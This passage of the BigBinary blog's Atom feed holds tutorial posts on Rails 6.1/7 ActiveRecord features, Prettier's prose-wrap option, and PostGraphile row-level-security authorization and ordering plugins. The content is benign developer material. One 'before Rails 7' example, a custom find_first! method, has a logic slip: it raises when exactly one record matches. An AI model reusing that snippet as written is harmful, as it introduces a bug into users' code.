\&quot;comments\&quot;.\&quot;id\&quot; NOT IN (1, 2)&quot;</code></pre><p>The excluding method applies to activerecord association as well.</p><pre><code class="language-ruby">=&gt; comments = current_user.comments.excluding(comment1, comment2)=&gt; &quot;SELECT \&quot;comments\&quot;.* FROM \&quot;comments\&quot; WHERE \&quot;comments\&quot;.\&quot;user_id\&quot; = 1 AND \&quot;comments\&quot;.\&quot;id\&quot; NOT IN (1, 2)&quot;</code></pre><p>The alias method <code>without</code> can also be used instead of <code>excluding</code>.</p><pre><code class="language-ruby">=&gt; users = User.without(current_user)=&gt; &quot;SELECT \&quot;users\&quot;.* FROM \&quot;users\&quot; WHERE \&quot;users\&quot;.\&quot;id\&quot; != 1&quot;=&gt; comments = Comment.without(comment1)=&gt; &quot;SELECT \&quot;comments\&quot;.* FROM \&quot;comments\&quot; WHERE \&quot;comments\&quot;.\&quot;id\&quot; != 1&quot;</code></pre><p>Check out these pull request <a href="https://github.com/rails/rails/pull/41439">41439</a>&amp; <a href="https://github.com/rails/rails/pull/41465">41465</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds nulls_first and nulls_last methods to Arel for PostgreSQL]]></title>
       <author><name>Berin Larson</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-nulls-first-and-nulls-last-to-arel"/>
      <updated>2021-03-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-nulls-first-and-nulls-last-to-arel</id>
      <content type="html"><![CDATA[<p>In PostgreSQL, when sorting output rows in descending order,columns with null values will appear first.</p><p>Let's take this example of ordering users by the number of times they have logged in.</p><pre><code class="language-sql">postgres=&gt; SELECT * from users ORDER BY login_count DESC;       name        | login_count-------------------+------------- Johnny Silverhand |        NULL Jackie Welles     |         202 V                 |           1(3 rows)</code></pre><p>This is not useful since most of the time we would want the null values to appear last.</p><p>PostgreSQL provides <code>NULLS FIRST</code> and <code>NULLS LAST</code> options for the <code>ORDER BY</code> clause for this use case.</p><pre><code class="language-ruby">irb&gt; pp User.order(&quot;login_count DESC NULLS LAST&quot;).        pluck(:name, :login_count)(0.9 ms)  SELECT &quot;users&quot;.&quot;name&quot;, &quot;users&quot;.&quot;login_count&quot; FROM &quot;users&quot;          ORDER BY login_count DESC NULLS LAST=&gt; [[&quot;Jackie Welles&quot;, 202],   [&quot;V&quot;, 1],   [&quot;Johnny Silverhand&quot;, nil]]</code></pre><p>In Rails 6.1, we can use the new <code>nulls_first</code> or <code>nulls_last</code> methods to construct the same queryusing Arel.</p><pre><code class="language-ruby">irb&gt; pp User.order(User.arel_table[:login_count].desc.nulls_last).        pluck(:name, :login_count)(0.9 ms)  SELECT &quot;users&quot;.&quot;name&quot;, &quot;users&quot;.&quot;login_count&quot; FROM &quot;users&quot;          ORDER BY login_count DESC NULLS LAST=&gt; [[&quot;Jackie Welles&quot;, 202],   [&quot;V&quot;, 1],   [&quot;Johnny Silverhand&quot;, nil]]</code></pre><p>The resulting code is slightly more verbose for this simple example. But Arel really shines when programmatically constructing complex SQL queries.</p><p>Check out this<a href="https://github.com/rails/rails/pull/38131">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.0 adds ActiveRecord::FinderMethods 'sole' and 'find_sole_by']]></title>
       <author><name>Akanksha Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-active-record-finder-methods"/>
      <updated>2021-03-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-active-record-finder-methods</id>
      <content type="html"><![CDATA[<p>&lt;br/&gt;</p><h3>Before Rails 7.0</h3><p>There were no methods defined to find and assert the presence of exactly onerecord at the same time.</p><p>For example, we have a class Product with a <code>price</code> field and we want to find asingle product that has a price of 100. For zero or multiple products with theprice of 100, we want to raise an error. We can not add database constraints tomake a unique field of <code>price</code>.</p><p>Now to solve the above query, we don't have any method defined in<code>ActiveRecord::FinderMethods</code> module. We can find a product with the given priceor raise an error if no record is found using the queries mentioned in the belowexample.</p><pre><code class="language-ruby">Product.find_by!(price: price)#=&gt; ActiveRecord::RecordNotFound Exception     (if no Product with the given price)#=&gt; #&lt;Product ...&gt;                             (first product with the given price)Product.where(price: price).first!#=&gt; ActiveRecord::RecordNotFound Exception     (if no Product with the given price)#=&gt; #&lt;Product ...&gt;                             (first product with the given price)</code></pre><p>We can only use database constraints to make a field unique and if addingconstraints is impractical then we would have to define our own method.</p><p>For example:</p><pre><code class="language-ruby">def self.find_first!(arg, *args)  products = where(arg, *args)  case  when products.empty?    raise_record_not_found_exception!  when products.count &gt; 0    raise 'More than one record present'  else    products.first  endendProduct.find_first!(price: price)#=&gt; ActiveRecord::RecordNotFound Exception     (if no Product with the given price)#=&gt; #&lt;Product ...&gt;                             (if one Product with the given price)#=&gt; ActiveRecord::SoleRecordExceeded Exception (if more than one Product with the given price)</code></pre><h3>After Rails 7.0</h3><p>Rails 7.0 has added <code>#sole</code> and <code>#find_sole_by</code> methods in theActiveRecord::FinderMethods module. These methods are used to find and assertthe presence of exactly one record.</p><p>When a user wants to find a single row, but also wants to assert that therearen't any other rows matching the condition (especially for when the databaseconstraints aren't enough or are impractical), then these methods come into use.</p><p>For example:</p><pre><code class="language-ruby">class Product    validates :price, presence: trueendProduct.where([&quot;price = %?&quot;, price]).sole#=&gt; ActiveRecord::RecordNotFound Exception     (if no Product with the given price)#=&gt; #&lt;Product ...&gt;                             (if one Product with the given price)#=&gt; ActiveRecord::SoleRecordExceeded Exception (if more than one Product with the given price)Product.find_sole_by(price: price)#=&gt; ActiveRecord::RecordNotFound Exception     (if no Product with the given price)#=&gt; #&lt;Product ...&gt;                             (if one Product with the given price)#=&gt; ActiveRecord::SoleRecordExceeded Exception (if more than one Product with the given price)</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/40768">pull request</a> for moredetails.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds Enumerable#maximum]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-enumerable-maximum"/>
      <updated>2021-02-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-enumerable-maximum</id>
      <content type="html"><![CDATA[<p>Rails 7 adds support for <code>Enumerable#maximum</code> and <code>Enumerable#minimum</code> to easilycalculate the maximum and minimum value from a collection of enumerableelements.</p><p>Before Rails 7, we could only achieve the same results with a combination of<code>map</code> &amp; <code>max</code> or <code>min</code> functions over the enumerable collection.</p><pre><code class="language-ruby">=&gt; Item = Struct.new(:price)=&gt; items = [Item.new(12), Item.new(8), Item.new(24)]=&gt; items.map { |x| x.price }.max=&gt; 24=&gt; items.map { |x| x.price }.min=&gt; 8</code></pre><p>This is simplified with Rails 7's newly-introduced <code>maximum</code> and <code>minimum</code>methods.</p><pre><code class="language-ruby">=&gt; items.maximum(:price)=&gt; 24=&gt; items.minimum(:price)=&gt; 8</code></pre><p>These methods are available through Action Controller's<a href="https://api.rubyonrails.org/v6.1.0/classes/ActionController/ConditionalGet.html#method-i-fresh_when">fresh_when</a>and<a href="https://api.rubyonrails.org/v6.1.0/classes/ActionController/ConditionalGet.html#method-i-stale-3F">stale?</a>for convenience.</p><pre><code class="language-ruby"># Before Rails 7def index  @items = Item.limit(20).to_a  fresh_when @items, last_modified: @items.pluck(:updated_at).maxend# After Rails 7def index  @items = Item.limit(20).to_a  fresh_when(@items)end</code></pre><p>The <code>etag</code> or <code>last_modified</code> header values will be properly set here based onthe maximum value of the <code>updated_at</code> field.</p><p>Check out this <a href="https://github.com/rails/rails/pull/41404">pull request</a> formore details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Prettier's Prose Wrap and eslint maximum-line-length error]]></title>
       <author><name>Mazahir B Haroon</name></author>
      <link href="https://www.bigbinary.com/blog/prettier-prose-wrap-option"/>
      <updated>2021-02-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/prettier-prose-wrap-option</id>
      <content type="html"><![CDATA[<p>If you go through the Prettier's Prose Wrap documentation, you can see that itprovides 3 options, that is</p><ul><li><code>&quot;always&quot;</code> - Wrap prose if it exceeds the print width.</li><li><code>&quot;never&quot;</code> - Do not wrap prose.</li><li><code>&quot;preserve&quot;</code> - Wrap prose as-is. (First available in v1.9.0)</li></ul><p>Now, this does not exactly give a clear idea on what each feature does, and itcould be a little confusing especially between the <code>&quot;never&quot;</code> and <code>&quot;preserve&quot;</code>options.</p><p>In the below video we walk you through these options and tries to get you aclear idea on Prettier's Prose Wrap and its use-case.</p><p>&lt;div class=&quot;youtube-video-container&quot;&gt;&lt;iframe width=&quot;560&quot; height=&quot;315&quot; src=&quot;https://www.youtube.com/embed/2LN3JfopqTY&quot; frameborder=&quot;0&quot; allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot; allowfullscreen&gt;&lt;/iframe&gt;&lt;/div&gt;</p><h2>Links to the pages mentioned in the above video</h2><ul><li><a href="https://prettier.io/docs/en/options.html#prose-wrap">Prose Wrap Documentation</a></li><li><a href="https://prettier.io/docs/en/option-philosophy.html">Prettier's Philosophy</a></li><li><a href="https://prettier.io/playground/">Prettier's Playground</a></li><li><a href="https://github.com/isaacs/github/issues/1013">Github comments not compliant with GFM soft line breaks?</a></li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds support for PostgreSQL interval data type]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-postgresql-interval-data-type"/>
      <updated>2021-01-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-postgresql-interval-data-type</id>
      <content type="html"><![CDATA[<p>&lt;br /&gt;</p><h3>What is PostgreSQL Interval Data Type?</h3><p>PostgreSQL Interval Data Type allows us to store a duration/period of time inyears, months, days, hours, minutes, seconds, etc. It also allows us to performarithmetic operations on that interval.</p><p>There are two input formats for interval data. These formats are used to writeinterval values.</p><ol><li>Verbose format:</li></ol><pre><code class="language-ruby">  &lt;quantity&gt; &lt;unit&gt; [&lt;quantity&gt; &lt;unit&gt;...] [&lt;direction&gt;]  # Examples:  '2 years ago'  '12 hours 13 minutes ago'  '8 years 7 months 2 days 3 hours'</code></pre><ul><li><code>quantity</code> can be any number.</li><li><code>unit</code> can be any granular unit of time in plural or singular form likedays/day, months/month, weeks/week, etc..</li><li><code>direction</code> can be <code>ago</code> or an empty string.</li></ul><ol start="2"><li>ISO 8601 formats:</li></ol><pre><code class="language-ruby">P &lt;quantity&gt; &lt;unit&gt; [ &lt;quantity&gt; &lt;unit&gt; ...] [ T [ &lt;quantity&gt; &lt;unit&gt; ...]]</code></pre><ul><li>ISO 8601 format always starts with <code>P</code>.</li><li><code>quantity</code> and <code>unit</code> before <code>T</code> represents years, months, weeks and days ofan interval.</li><li><code>quantity</code> and <code>unit</code> after <code>T</code> represents the time-of-day unit.</li></ul><pre><code class="language-ruby"># ExamplesP1Y1M1D =&gt; interval of '1 year 1 month 1 day'P3Y1DT2H =&gt; interval of '3 years 1 day 2 hours'P5Y2MT3H2M =&gt; interval of '5 years 2 months 3 hours 2 minutes'# NOTE: If `M` appears before `T`,# it is month/months and if it appears after `T`, it signifies minute/minutes.ORP [ years-months-days ] [ T hours:minutes:seconds ]# ExamplesP0012-07-00T00:09:00 =&gt; interval of '12 years 7 months 9 minutes'P0000-10-00T10:00:00 =&gt; interval of '10 months 10 hours'</code></pre><h4>Arithmetic operations on interval</h4><p>We can easily apply addition, subtraction and multiplication operations oninterval data.</p><pre><code class="language-ruby">'10 hours 10 minutes' + '30 minutes' =&gt; '10 hours 40 minutes''10 hours 10 minutes' - '10 minutes' =&gt; '10 hours'60 * '10 minute' =&gt; '10 hours'</code></pre><h3>Before Rails 6.1</h3><p>PostgreSQL <code>interval</code> data type can be used in Rails but Active Record treats<code>interval</code> as a string. In order to convert it to an <code>ActiveSupport::Duration</code>object, we have to manually alter the <code>IntervalStyle</code> of the database to<code>iso_8601</code> and then parse it as shown below:</p><pre><code class="language-ruby">execute &quot;ALTER DATABASE &lt;our_database_name&gt; SET IntervalStyle = 'iso_8601'&quot;ActiveSupport::Duration.parse(the_iso_8601_formatted_string)</code></pre><h3>Rails 6.1</h3><p>Rails 6.1 adds built-in support for the PostgreSQL <code>interval</code> data type. Itautomatically converts <code>interval</code> to an <code>ActiveSupport::Duration</code> object whenfetched from a database. When a record containing the <code>interval</code> field is saved,it is serialized to an ISO 8601 formatted duration string.</p><p>The following example illustrates how it can be used now:</p><pre><code class="language-ruby"># db/migrate/20201109111850_create_seminars.rbclass CreateSeminars &lt; ActiveRecord::Migration[6.1]  def change    create_table :seminars do |t|      t.string :name      t.interval :duration      t.timestamps    end  endend# app/models/seminar.rbclass Seminar &lt; ApplicationRecord  attribute :duration, :intervalend&gt;&gt; seminar = Seminar.create!(name: 'RubyConf', duration: 5.days)&gt;&gt; seminar=&gt; #&lt;Event id: 1, name: &quot;RubyConf&quot;, duration: 5 days, created_at: ...&gt;&gt;&gt; seminar.duration=&gt; 5 days&gt;&gt; seminar.duration.class=&gt; ActiveSupport::Duration&gt;&gt; seminar.duration.iso8601=&gt; &quot;P5D&quot;# ISO 8601 strings can also be provided as interval's value&gt;&gt; seminar = Seminar.create!(name: 'GopherConIndia', duration: 'P5DT7H6S')&gt;&gt; seminar=&gt; #&lt;Event id: 2, name: &quot;GopherConIndia&quot;, duration: 5 days, 7 hours, and 6 seconds, created_at: ...&gt;# Invalid values to interval are written as NULL in the database.&gt;&gt; seminar = Seminar.create!(name: 'JSConf', duration: '3 days')&gt;&gt; seminar=&gt; #&lt;Event id: 3, name: &quot;JSConf&quot;, duration: nil, created_at: ...&gt;</code></pre><p>If we want to keep the old behaviour where <code>interval</code> is treated as a string, weneed to add the following in the model.</p><pre><code class="language-ruby"># app/models/seminar.rbclass Seminar &lt; ApplicationRecord  attribute :duration, :stringend</code></pre><p>If the <code>attribute</code> is not set in the model, it will throw the followingdeprecation warning.</p><pre><code class="language-plaintext">DEPRECATION WARNING: The behavior of the `:interval` type will be changing in Rails 6.2to return an `ActiveSupport::Duration` object. If you'd like to keepthe old behavior, you can add this line to Event model:  attribute :duration, :stringIf you'd like the new behavior today, you can add this line:  attribute :duration, :interval</code></pre><p>Check out the<a href="https://github.com/rails/rails/commit/0475215d4fa1a6db2a92a0065081fe19c64cc124">commit</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 allows per environment configuration support for Active Storage]]></title>
       <author><name>Shashank</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-allows-per-environment-configuration-support-for-active-storage"/>
      <updated>2021-01-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-allows-per-environment-configuration-support-for-active-storage</id>
      <content type="html"><![CDATA[<p>Rails 6.1 allows environment-specific configuration filesto set up Active Storage.</p><p>In development, the <code>config/storage/development.yml</code> filewill take precedence over the <code>config/storage.yml</code> file.Similarly, in production, the <code>config/storage/production.yml</code> filewill take precedence.</p><p>If an environment-specific configuration is not present,Rails will fall back to the configuration declared in <code>config/storage.yml</code>.</p><h2>Why was it needed?</h2><p>Before Rails 6.1, all storage services were defined in one file,each environment could set its preferred service in <code>config.active_storage.service</code>,and that service would be used for all attachments.</p><p>Now we can override the default application-wide storage servicefor any attachment, like this:</p><pre><code class="language-ruby">class User &lt; ApplicationModel  has_one_attached :avatar, service: :amazon_s3end</code></pre><p>And we can declare a custom <code>amazon_s3</code> service in the <code>config/storage.yml</code> file:</p><pre><code class="language-ruby">amazon_s3:  service: S3  bucket: &quot;...&quot;  access_key_id: &quot;...&quot;  secret_access_key: &quot;...&quot;</code></pre><p>But we are still using the same service for storing avatarsin both production and development environments.</p><p>To use a separate service per environment,Rails allows the creation of configuration files for each.</p><h2>How do we do that?</h2><p>Let's change the service to something more generic in the User model:</p><pre><code class="language-ruby">class User &lt; ApplicationModel  has_one_attached :avatar, service: :store_avatarsend</code></pre><p>And add some environment configurations:</p><p>For production we'll add <code>config/storage/production.yml</code>:</p><pre><code class="language-ruby">store_avatars:  service: S3  bucket: &quot;...&quot;  access_key_id: &quot;...&quot;  secret_access_key: &quot;...&quot;</code></pre><p>And for development we'll add <code>config/storage/development.yml</code>:</p><pre><code class="language-ruby">store_avatars:  service: Disk  root: &lt;%= Rails.root.join(&quot;storage&quot;) %&gt;</code></pre><p>This will ensure that Rails will store the avatarsdifferently per environment.</p><p>Check out the<a href="https://github.com/rails/rails/pull/40294">pull request</a>to learn more.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Authorization in REST vs Postgraphile]]></title>
       <author><name>Amal Jose</name></author>
      <link href="https://www.bigbinary.com/blog/authorization-in-rest-vs-postgraphile"/>
      <updated>2021-01-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/authorization-in-rest-vs-postgraphile</id>
      <content type="html"><![CDATA[<p><a href="https://www.graphile.org/postgraphile/">Postgraphile</a> is a great tool formaking instant GraphQL from a PostgreSQL database. When I started working withPostgraphile, its authorization part felt a bit different compared to the RESTbased backends which I had worked with before. Here I will share somedifferences that I noted.</p><p>First, let's see <strong>Authentication</strong> vs <strong>Authorization</strong>.</p><p><strong>Authentication</strong> is determining whether a user is logged in or not.<strong>Authorization</strong> is then deciding what the users has permission to do or see.</p><h2>Comparing the implementation of a blog application using Postgraphile vs REST</h2><p>Suppose we have to build a blog application with the below schema.</p><p><img src="/blog_images/2021/authorization-in-rest-vs-postgraphile/blog-application.png" alt="event delegation"></p><h6>Features of the blog application.</h6><ul><li><p>Display <strong>published</strong> blogs with <strong>is_published = true</strong> to all users.</p></li><li><p>Display <strong>unpublished</strong> blogs with <strong>is_published = false</strong> to its creatoronly.</p></li></ul><h2>REST Implementation</h2><p>The REST implementation with JavaScript and<a href="https://sequelize.org/master/manual/model-querying-basics.html">sequelize</a> canbe like below.</p><p><img src="/blog_images/2021/authorization-in-rest-vs-postgraphile/rest-implementation.jpeg" alt="REST implementation"></p><p>The <strong>client</strong> requests the blogs using an endpoint, it also attaches the accesstoken received from the authentication service.</p><pre><code class="language-js">const getBlogs = () =&gt;  requestData({    endpoint: `/api/blogs`,    accessToken: &quot;***&quot;,  });</code></pre><p>The backend code in the <strong>server</strong> receives the request, finds the currentlogged in user from the access token, and requests the data based on the currentlogged in user from the database.</p><pre><code class="language-js">const userEmail = findEmail(accessToken);const blogs = await models.Blogs.findAll({  where: { [Op.or]: [{ creatorEmail: userEmail }, { isPublished: true }] },});res.send(blogs);</code></pre><p>Here, the backend code finds the users email from the access token, thenrequests the database to give the list of blogs that have creatorEmail matchingto the current user's email or the field isPublished is true.</p><p>The <strong>database</strong> will return whatever data the server requests.</p><p>Similarly, for creating, editing, and deleting blogs, we can have differentend-points to handle the authorization logic in the backend code.</p><h2>Postgraphile Implementation</h2><p>The postgraphile implementation can be like below.</p><p><img src="/blog_images/2021/authorization-in-rest-vs-postgraphile/postgraphile-implementation.jpeg" alt="postgraphile implementation"></p><p>The <strong>client</strong> requests the blogs using a GraphQL query. It also attaches theaccess token received from the authentication service.</p><pre><code class="language-js">const data = requestQuery({ query: &quot;allBlogs {         nodes {            content            creatorEmail            visiblityType           }        }&quot; accessToken: '***'})</code></pre><p>In the <strong>server,</strong> we configure Postgraphile to pass the user information to thedatabase.</p><pre><code class="language-js">export postgraphile(DATABASE_URL, schemaName, {  pgSettings: (req) =&gt; {     const userEmail = findEmail(accessToken);     return({         'current_user_email': userEmail     })  }})</code></pre><p>We can pass a function as Postgraphiles pg<a href="https://www.graphile.org/postgraphile/usage-library/#pgsettings-function">Settings</a>property, whose return value will be accessible from the connected Postgresdatabase by calling the current_setting function.</p><p>In the <strong>database,</strong> the row-level security policies can be defined to controlthe data access.</p><p><a href="https://www.postgresql.org/docs/12/ddl-rowsecurity.html">Row-level security policies</a>are basically just SQL that either evaluates to true or false. If a policy iscreated and enabled for a table, that policy will be checked before doing anoperation on the table.</p><pre><code class="language-pgsql">create policy blogs_policy_selecton public.blogs for select to usersUSING ( isPublished OR creator_email = current_setting('current_user_email'));ALTER TABLE blogs ENABLE ROW LEVEL SECURITY;</code></pre><p>Here the policy named <em>blogs_policy_select</em> will be checked before selecting arow in the table <em>public.blogs.</em> A row will be selected only if the<em>isPublished</em> field is <em>true</em> or <em>creator_email</em> matches with the current user'semail.</p><p>Similarly, for creating, editing, and deleting blogs, we can have row levelsecurity policies for INSERT, UPDATE, and DELETE operations on the table.</p><h2>Conclusion</h2><p>The REST implementation does the authorization on the server level but thePostgraphile does it on the database level. Each implementation has its ownadvantages and disadvantages, which is a topic for another day.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Sort query data on associated table in PostGraphile]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/sort-query-data-on-associated-tables-in-postgraphile-using-order-by-plugin"/>
      <updated>2021-01-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/sort-query-data-on-associated-tables-in-postgraphile-using-order-by-plugin</id>
      <content type="html"><![CDATA[<p><a href="https://www.graphile.org/postgraphile/">PostGraphile</a> provides sorting on allcolumns of a table in a GraqhQL query by default with <code>orderBy</code> argument.</p><p>Although, sorting based on associated tables columns or adding a custom sortcan be achieved via plugins. In this blog we will explore two such plugins.</p><h3>Using <code>pg-order-by-related</code> plugin</h3><p><a href="https://github.com/graphile-contrib/pg-order-by-related">pg-order-by-related</a>plugin allows us to sort query result based on associated table's columns. Itdoes that by adding enums for all associated table's columns. Here's what weneed to do to use this plugin.</p><h4>Installation</h4><pre><code class="language-shell">npm i @graphile-contrib/pg-order-by-related</code></pre><h4>Adding the plugin</h4><pre><code class="language-javascript">const express = require(&quot;express&quot;);const { postgraphile } = require(&quot;postgraphile&quot;);const PgOrderByRelatedPlugin = require(&quot;@graphile-contrib/pg-order-by-related&quot;);const app = express();app.use(  postgraphile(process.env.DATABASE_URL, &quot;public&quot;, {    appendPlugins: [PgOrderByRelatedPlugin],  }));</code></pre><h4>Using associated table column enum with <code>orderBy</code> argument</h4><pre><code class="language-graphql">query getPostsSortedByUserId {  posts: postsList(orderBy: AUTHOR_BY_USER_ID__NAME_ASC) {    id    title    description    author: authorByUserId {      id      name    }  }}</code></pre><p><code>pg-order-by-related</code> plugin is useful only when we want to sort data based onfirst level association. If we want to apply <code>orderBy</code> on second level tablecolumns or so, we have to use <code>makeAddPgTableOrderByPlugin</code>.</p><h3>Using <code>makeAddPgTableOrderByPlugin</code></h3><p><a href="https://www.graphile.org/postgraphile/make-add-pg-table-order-by-plugin/">makeAddPgTableOrderByPlugin</a>allows us to add custom enums that are accessible on specified table's <code>orderBy</code>argument. We can write our custom select queries using this plugin.</p><p>We will use a complex example to understand the use-case of custom <code>orderBy</code>enum.</p><p>In our posts list query, we want posts to be sorted by author's address. Addresshas country, state and city columns. We want list to be sorted by country, stateand city in the same order.</p><p>Here's how we can achieve this using <code>makeAddPgTableOrderByPlugin</code>.</p><p><code>plugins/orderBy/orderByPostAuthorAddress.js</code></p><pre><code class="language-javascript">import { makeAddPgTableOrderByPlugin, orderByAscDesc } from &quot;graphile-utils&quot;;export default makeAddPgTableOrderByPlugin(  &quot;public&quot;,  &quot;post&quot;,  ({ pgSql: sql }) =&gt; {    const author = sql.identifier(Symbol(&quot;author&quot;));    const address = sql.identifier(Symbol(&quot;address&quot;));    return orderByAscDesc(      &quot;AUTHOR_BY_USER_ID__ADDRESS_ID__COUNTRY__STATE__CITY&quot;,      ({ queryBuilder }) =&gt; sql.fragment`(            SELECT              CONCAT(                ${address}.city,                ', ',                ${address}.state,                ', ',                ${address}.country              ) AS full_address            FROM public.user as ${author}            JOIN public.address ${address} ON ${author}.address_id = ${address}.id            WHERE ${author}.id = ${queryBuilder.getTableAlias()}.user_id            ORDER BY ${address}.country DESC, ${address}.state DESC, ${address}.city DESC            LIMIT 1          )`    );  });</code></pre><h4>Export all custom <code>orderBy</code> plugins</h4><p><code>plugins/orderBy/index.js</code></p><pre><code class="language-javascript">export { default as orderByPostAuthorAddress } from &quot;./orderByPostAuthorAddress&quot;;</code></pre><h4>Append custom <code>orderBy</code> plugins to <code>postgraphile</code></h4><pre><code class="language-javascript">const express = require(&quot;express&quot;);const { postgraphile } = require(&quot;postgraphile&quot;);import * as OrderByPlugins from &quot;./plugins/orderby&quot;;const app = express();app.use(  postgraphile(process.env.DATABASE_URL, &quot;public&quot;, {    appendPlugins: [...Object.values(OrderByPlugins)],  }));</code></pre><h4>Using custom enum with <code>orderBy</code> argument</h4><pre><code class="language-graphql">query getPostsSortedByAddress {  posts: postsList(    orderBy: AUTHOR_BY_USER_ID__ADDRESS_ID__COUNTRY__STATE__CITY  ) {    id    title    description    author: authorByUserId {      id      name      address {        id        country        state        city      }    }  }}</code></pre><p>Please head to<a href="https://github.com/graphile-contrib/pg-order-by-related">pg-order-by-related</a>and<a href="https://www.graphile.org/postgraphile/make-add-pg-table-order-by-plugin/">makeAddPgTableOrderByPlugin</a>pages for detailed documentation.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds support for belongs_to to has_many inversing]]></title>
       <author><name>Siddharth Shringi</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-support-for-belongs_to-to-has_many-inversing"/>
      <updated>2021-01-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-support-for-belongs_to-to-has_many-inversing</id>
      <content type="html"><![CDATA[<p>Before Rails 6.1,we could only traverse the object chainin one direction - from has_many to belongs_to.Now we can traverse the chain bi-directionally.</p><p>The <code>inverse_of</code> option, both in <code>belongs_to</code> and <code>has_many</code> isused to specify the name of the inverse association.</p><p>Let's see an example.</p><pre><code class="language-ruby">class Author &lt; ApplicationRecord  has_many :books, inverse_of: :authorendclass Book &lt; ApplicationRecord  belongs_to :author, inverse_of: :booksend</code></pre><h3>Before Rails 6.1</h3><h4>has_many to belongs_to inversing</h4><pre><code class="language-ruby">irb(main):001:0&gt; author = Author.newirb(main):002:0&gt; book = author.books.buildirb(main):003:0&gt; author == book.author=&gt; true</code></pre><p>In the above code,first we created the <code>author</code> and thena <code>book</code> instance through the <code>has_many</code> association.</p><p>In line 3,we traverse the object chainback to the author using the <code>belongs_to</code> association methodon the book instance.</p><h4>belongs_to to has_many inversing</h4><pre><code class="language-ruby">irb(main):001:0&gt; book = Book.newirb(main):002:0&gt; author = book.build_authorirb(main):003:0&gt; author.books=&gt; #&lt;ActiveRecord::Associations::CollectionProxy []&gt;</code></pre><p>In the above case,we created the <code>book</code> instance and thenwe created the <code>author</code> instance usingthe method added by <code>belongs_to</code> association.</p><p>But when we tried to traverse the object chainthrough the <code>has_many</code> association,we got an empty collectioninstead of one with the <code>book</code> instance.</p><h3>After changes in Rails 6.1</h3><p>The <code>belongs_to</code> inversing can now be traversedin the same way as the <code>has_many</code> inversing.</p><pre><code class="language-ruby">irb(main):001:0&gt; book = Book.newirb(main):002:0&gt; author = book.build_authorirb(main):003:0&gt; author.books=&gt; #&lt;ActiveRecord::Associations::CollectionProxy [#&lt;Book id: nil, author_id: nil, created_at: nil, updated_at: nil&gt;]&gt;</code></pre><p>Here we get the collection with the <code>book</code> instanceinstead of an empty collection.</p><p>We can also verify using a test.</p><pre><code class="language-ruby">class InverseTest &lt; ActiveSupport::TestCase  def test_book_inverse_of_author    author = Author.new    book = author.books.build    assert_equal book.author, author  end  def test_author_inverse_of_book    book = Book.new    author = book.build_author    assert_includes author.books, book  endend</code></pre><p>In previous Rails versions, the test cases would fail.</p><pre><code class="language-shell"># Running:.FFailure:InverseTest#test_author_inverse_of_bookExpected #&lt;ActiveRecord::Associations::CollectionProxy []&gt; to include #&lt;Book id: nil, author_id: nil, created_at: nil, updated_at: nil&gt;.Finished in 0.292532s, 6.8369 runs/s, 10.2553 assertions/s.2 runs, 3 assertions, 1 failures, 0 errors, 0 skips</code></pre><p>In Rails 6.1, both the tests will pass.</p><pre><code class="language-shell"># Running:..Finished in 0.317668s, 6.2959 runs/s, 9.4438 assertions/s.2 runs, 3 assertions, 0 failures, 0 errors, 0 skips</code></pre><p>Check out this<a href="https://github.com/rails/rails/pull/34533">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Additional database-specific rake tasks for multi-database users]]></title>
       <author><name>Amit Gupta</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-additional-database-specific-tasks"/>
      <updated>2021-01-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-additional-database-specific-tasks</id>
      <content type="html"><![CDATA[<p>Rails 6.1 provides additional tasks to work with a specific database whenworking in a multi database setup.</p><p>Before Rails 6.1, only the following tasks worked on a specific database.</p><ul><li>rails db:migrate:primary</li><li>rails db:create:primary</li><li>rails db:drop:primary</li></ul><p>But some tasks that could be applied to a specific database were missing. Let'scheckout an example.</p><p>Before Rails 6.1, running a top level migration on a multi-database project,dumped the schema for all the configured databases, but if a database specificmigration was run, the schema was not dumped. And there were no tasks tomanually dump the schema of a specific database.</p><pre><code class="language-ruby">&gt; rails db:schema:dump:primaryrails aborted!Don't know how to build task `db:schema:dump:primary` (See the list of available tasks with `rails --tasks`)Did you mean? db:schema:dump</code></pre><p>Therefore, in Rails 6.1, the following database specific tasks were introduced.</p><ul><li>rails db:schema:dump:primary</li><li>rails db:schema:load:primary</li><li>rails db:test:prepare:primary</li></ul><p>Check out the <a href="https://github.com/rails/rails/pull/38449">pull request</a> for moredetails.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds strict_loading to warn lazy loading associations]]></title>
       <author><name>Dinesh Panda</name></author>
